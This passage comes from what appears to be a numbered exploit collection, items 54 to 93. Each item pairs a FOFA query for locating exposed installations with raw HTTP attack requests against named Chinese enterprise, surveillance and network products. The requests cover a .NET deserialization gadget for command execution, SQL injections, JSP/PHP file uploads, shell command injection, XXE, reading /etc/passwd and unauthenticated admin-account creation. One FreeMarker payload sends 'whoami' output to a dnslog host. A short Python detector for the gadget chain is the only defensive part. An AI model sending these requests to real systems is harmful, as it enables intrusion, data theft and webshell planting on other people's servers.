        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL; the marker string in the response proves the command ran in the web directory:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

The AjaxPro handler deserializes the storeID argument with type information taken from the JSON itself, so the "__type" chain ObjectDataProvider -> Process -> ProcessStartInfo turns a method call into Process.Start.

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the login endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using that Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
(The source page gives no request bodies for either step; the second call returns the user list.)

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA:app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

Same gadget as item 54 against a second AjaxPro handler; here the confirmation is the DNS lookup produced by ping rather than a file in the web root.

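Items 54 and 56 differ only in the handler path; the body is the same ObjectDataProvider gadget. For anyone triaging WAF or proxy captures from a T+ server, the following is an added detection example, not code from the source page or from Chanjet: it parses a JSON request body, walks it for "__type" members, and reports when the ObjectDataProvider / Process / ProcessStartInfo chain is present, together with the command line that would have run. The sample body is the one from item 56; the path filter, the type list and the function names are this example's own.

```python
"""Detect the ObjectDataProvider gadget chain in AjaxPro JSON bodies
(items 54 and 56). Added example, not part of the source page."""
import json
import re
from typing import Any, Dict, List, Optional

# Type names that make up the page's payload. Matching is on the simple type
# name, so assembly version, culture and public key token text are irrelevant.
GADGET_TYPES = {
    "System.Windows.Data.ObjectDataProvider",
    "System.Diagnostics.Process",
    "System.Diagnostics.ProcessStartInfo",
}

# Only AjaxPro handlers under /tplus/ are inspected (the page's endpoint shape).
AJAXPRO_PATH = re.compile(r"/tplus/.*ajaxpro/.*\.ashx\?method=", re.IGNORECASE)


def type_name(type_field: str) -> str:
    """'System.Diagnostics.Process, System, Version=...' -> 'System.Diagnostics.Process'."""
    return type_field.split(",", 1)[0].strip()


def _walk(node: Any, out: List[Dict[str, Any]]) -> None:
    """Depth-first walk collecting every object that carries a string __type."""
    if isinstance(node, dict):
        if isinstance(node.get("__type"), str):
            out.append(node)
        for value in node.values():
            _walk(value, out)
    elif isinstance(node, list):
        for value in node:
            _walk(value, out)


def inspect_body(body: str) -> Optional[Dict[str, Any]]:
    """Return a finding when the body carries the gadget chain, otherwise None.
    Non-JSON bodies are ignored rather than treated as suspicious."""
    try:
        data = json.loads(body)
    except ValueError:
        return None
    typed: List[Dict[str, Any]] = []
    _walk(data, typed)
    seen = {type_name(n["__type"]) for n in typed}
    hits = seen & GADGET_TYPES
    if "System.Windows.Data.ObjectDataProvider" not in hits:
        return None
    method = next((n.get("MethodName") for n in typed
                   if type_name(n["__type"]) == "System.Windows.Data.ObjectDataProvider"), None)
    command = None
    for n in typed:
        if type_name(n["__type"]) == "System.Diagnostics.ProcessStartInfo":
            command = f"{n.get('FileName', '')} {n.get('Arguments', '')}".strip()
    return {"gadget_types": sorted(hits), "method": method, "command": command}


def triage_request(path: str, body: str) -> Optional[Dict[str, Any]]:
    """Path gate first, then body inspection; returns the finding or None."""
    if not AJAXPRO_PATH.search(path):
        return None
    return inspect_body(body)


# Constructed sample: the request line and body of item 56, unchanged.
SAMPLE_PATH = ("/tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx"
               "?method=GetStoreWarehouseByStore")
SAMPLE_BODY = """{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}"""

if __name__ == "__main__":
    print(triage_request(SAMPLE_PATH, SAMPLE_BODY))
```

Keying on the simple type names rather than on the full assembly-qualified strings is deliberate: the version and token fields can be varied freely by an attacker without changing what the deserializer instantiates.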
57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

Error-based: comparing the integer 1 with the @@version string makes SQL Server raise a conversion error that contains the version banner.

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

Same technique as item 57: the conversion error echoes 0xe10adc3949ba59abbe56e057f20f883e, the MD5 of 123456.

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

The payload is elided on the source page. The endpoint is the PrimeFaces dynamiccontent.properties.xhtml resource, i.e. the bundled PrimeFaces EL-injection weakness (CVE-2017-1000486) rather than code specific to XETUX, so any PrimeFaces payload for that issue applies.

60. 百卓 Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetOSpById xmlns="http://tempuri.org/">
<sId>1';waitfor delay '0:0:5'--+</sId>
</GetOSpById>
</soap:Body>
</soap:Envelope>

65. 优卡特 脸爱云 一脸通 smart management platform 1.0.55.0.0.1 privilege bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 has been created
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The vulnerability is confirmed if lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9
67. 万户 ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, the dir parameter sets the directory it is written to, and the fileType parameter sets the file type
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is then served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户 ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远 OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普 campus service management platform (掌上校园服务管理平台) service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
"command": "GetFZinfo",
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 garment management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为 flow-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视 (Uniview) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
"type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is shown below; it drops a Godzilla webshell
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD
Resulting URL: http://x.x.x.x/userfiles/index.jsp
86. Japanese tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒 明御安全网关 (security gateway) aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒 明御安全网关 (security gateway) aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联 FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视 IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视 operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
